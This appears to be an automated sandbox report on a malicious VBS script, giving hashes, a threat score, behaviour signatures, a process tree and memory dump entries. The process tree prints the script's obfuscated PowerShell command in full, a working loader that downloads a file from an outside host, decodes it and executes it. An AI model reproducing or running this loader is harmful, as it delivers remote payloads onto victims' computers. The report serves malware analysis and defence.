Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    30-06-2024 01:18

General

  • Target

    8028ef562bc9d2bd5035279b7cfd2abbd59ffb292b67a5a431379e2e5aa4b380.vbs

  • Size

    187KB

  • MD5

    7b1d4760615cc6bb3cc9219eb1468965

  • SHA1

    a4a57a4155fcd8351a1423134fc60df55769466d

  • SHA256

    8028ef562bc9d2bd5035279b7cfd2abbd59ffb292b67a5a431379e2e5aa4b380

  • SHA512

    49f9045ab51ab2aa7bbb2e76355c18616325af02d4b7a2374eb59d82a3bd9d081e773b96f8c5d78718a9e67acd9b47e8c5cc08e83a59e514b8179c0c91ddaaa1

  • SSDEEP

    3072:ImN8GGebKjeK3ubth+DCFxKCvBB/WnHPP1w/sLJFJ281QIHz1y8mNy7Ey1MgKTZl:I08GxbKja3+DCbKCvBB/WnHXC/sLJFJw

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8028ef562bc9d2bd5035279b7cfd2abbd59ffb292b67a5a431379e2e5aa4b380.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1120
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Cubito Afsnittenes8 Solbrsafters Snetykningen Vagtsommestes Sejls Observation Skaldyraflejringens Ricinelaidinic afforce Deloitte Gendarmere223 Baldrick uafrysteligt imbeciles Gozzard Burle Nosophobia Flydedokkers Turbokompressorerne Forpagtnigsafgifts Longways Strae blindsmmenes Cubito Afsnittenes8 Solbrsafters Snetykningen Vagtsommestes Sejls Observation Skaldyraflejringens Ricinelaidinic afforce Deloitte Gendarmere223 Baldrick uafrysteligt imbeciles Gozzard Burle Nosophobia Flydedokkers Turbokompressorerne Forpagtnigsafgifts Longways Strae blindsmmenes';If (${host}.CurrentCulture) {$Gbakkerne60++;}Function Selvforglemmelsen($Abampere){$spunky=$Abampere.Length-$Gbakkerne60;$tabelnavne='SUBsTRI';$tabelnavne+='ng';For( $Anguid=1;$Anguid -lt $spunky;$Anguid+=2){$Cubito+=$Abampere.$tabelnavne.Invoke( $Anguid, $Gbakkerne60);}$Cubito;}function Nordstenvind($Vimse){ & ($Guarantors21) ($Vimse);}$Retskredses=Selvforglemmelsen ' M,oHzNiSlKlCa /G5E.,0, ( W.iBn dAo wEsP hNST n1O0A.S0,;d W i n 6N4 ;S OxH6A4 ; Ar v :R1 2I1.. 0,)S G e.cRkeo./K2 0S1 0B0p1O0 1 .F i,rKe f o,x./T1s2B1f. 0T ';$Palletizer=Selvforglemmelsen 'MU sSe r -mASg.eMnUt ';$Vagtsommestes=Selvforglemmelsen '.h.t tOp.s.:,/O/TmWoCv iUe s mFagc k.tsaKl.kf.,c o,mO/ nAeKwIsD/ zBzOz /TRTe g l e r.nSeSs ..pmc.xS ';$Pugrees=Selvforglemmelsen 'O>A ';$Guarantors21=Selvforglemmelsen '.i eMx, ';$Miasmas='Skaldyraflejringens';$Stemmeurnernes109 = Selvforglemmelsen ' eAc h.o, ,%GaMp.pJd aAtUa %.\OD,a mHpCk oegTe nMd,e . O.v,em a& &P ae cahIo .t, ';Nordstenvind (Selvforglemmelsen 'A$BgSl oSb aDl.:MS e,cOobn d i.nNgF=V(.c m dK /.cw K$ SIt e,m.mRe uLr n.e.r n,e.s,1S0 9 )D ');Nordstenvind (Selvforglemmelsen '.$Gg l o bPaDlF:tS.n e,t.y,kAnIi nAg e,n =M$SV aFg,t sPoOmPmte sMt,e sN. sOpHlBi,tD(N$ PBuBgMr,e.eAs.)I ');Nordstenvind (Selvforglemmelsen 'T[FN.ePt .ES eUr v iUcZe P o iCn t MOa.n.a,gIeRr ]S:.: SHeFc ucr i tNy.PMrKo t o.cBoFlM =. P[ N eOt,.US eAc.upr i,tUyDPFrPo.tBo cHo.lKT y pEeE]R:D:,TLlSs 1.2K ');$Vagtsommestes=$Snetykningen[0];$nonagglutinator= (Selvforglemmelsen 'D$SgolUoUb aTlC:ZH,a bGs b uBr g e.rCe =,NJeKwM-EO,bSj e,cBt SFy sPtReUmK.SN estA.AWOeAb CUl.i ePn.t');$nonagglutinator+=$Seconding[1];Nordstenvind ($nonagglutinator);Nordstenvind (Selvforglemmelsen 'F$ HDaUb s b u rBg,e.r e..OHLe a dAePr.sN[ $EP aMlDlpeMt iEz e.r ]F=R$ R eStKsCk r.e dFsieKs ');$Daarekistelem=Selvforglemmelsen 'P$ HGaKbEsDbPu,r gde rkeS.OD oAwUnKl o,a,dWF iSlKe.( $ V.aNg.t s oCm,m eKs.tGe sN,F$CLSo nIgCwUa y sI), ';$Longways=$Seconding[0];Nordstenvind (Selvforglemmelsen 'P$bgBl.o bTa la: MPbReAl,p oJlFiCt usrFeAnF=,( T.e sItS-VP aDtGh d$SL o n gUw aAy sS)A ');while (!$Mbelpolituren) {Nordstenvind (Selvforglemmelsen 'B$HgMl o bPaSl.:.GPeonAnFeEmOp.r v eBtt=C$ t r u eG ') ;Nordstenvind $Daarekistelem;Nordstenvind (Selvforglemmelsen 'TSTtda rMtb-SSUl e eEpE F4T ');Nordstenvind (Selvforglemmelsen ',$ g l,o bEablV: MGb,e l.pCoNl.i t uFr e n = ( TGeTsLt -IPKa t h P$.LEoMn g wFa yDs,)R ') ;Nordstenvind (Selvforglemmelsen ' $ g l,oSb a lF:SS o l bAr.sMaefMt eCr sG=S$Kg.lDoCbIa lC:MAAfKs.n,i,tKt.eEn e,sS8U+F+ %,$BS,nDe,t yMk n iEn,g eHn .ScBoPu nFtA ') ;$Vagtsommestes=$Snetykningen[$Solbrsafters];}$Placentoid=334153;$Umuliggjordes143=26684;Nordstenvind (Selvforglemmelsen ' $ gSl oAbSa.l,:,RSi,c iAnse,l aSi.dNienFiSc I=, UGNeVt - C o.n t ennAtR A$.L,oSnSgRwoa,y s ');Nordstenvind (Selvforglemmelsen ' $ gPl o bHaSl.: KPrimOm eMr sPjsl e n s = B[DS y s.tGeOmU.SC.oKn v eRr,t ]L:D:SFVr o mVB,a sFeB6 4 S.tAr iCnTg (C$ RFi c.i nFe,l a,i,d.iKn iRc ). ');Nordstenvind (Selvforglemmelsen ' $ gKl o.bSaSl :RG e nVdGa r mPe rle 2,2C3 B= b[,SDy s t etmK. TSe,x.tF.GE.ndcMo d,iAnfgF]B: :HAHS C ISI . G.e t SCtmr i n gV( $MKTrDmPmUeIr s,j lSe,n sB)t ');Nordstenvind (Selvforglemmelsen 'c$Cg l o b,a lS:PW,oMrUl.dMissLhI2 5,5 =t$.GFeOn,dAa,rAm e.rPeU2K2,3 .,s u bCsRt,rUi nFg (g$HP l aScVe,n tgo.i.dN,C$JUAm.u.lti gsgsjMour dKeOs.1s4 3 )I ');Nordstenvind $Worldish255;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2744
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dampkogende.Ove && echo t"
        3⤵
          PID:2488

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2744-21-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp
      Filesize

      4KB

    • memory/2744-22-0x000000001B690000-0x000000001B972000-memory.dmp
      Filesize

      2.9MB

    • memory/2744-24-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp
      Filesize

      9.6MB

    • memory/2744-25-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp
      Filesize

      9.6MB

    • memory/2744-23-0x0000000002790000-0x0000000002798000-memory.dmp
      Filesize

      32KB

    • memory/2744-26-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp
      Filesize

      9.6MB

    • memory/2744-27-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp
      Filesize

      9.6MB

    • memory/2744-28-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp
      Filesize

      9.6MB

    • memory/2744-29-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp
      Filesize

      4KB

    • memory/2744-30-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp
      Filesize

      9.6MB

    • memory/2744-31-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp
      Filesize

      9.6MB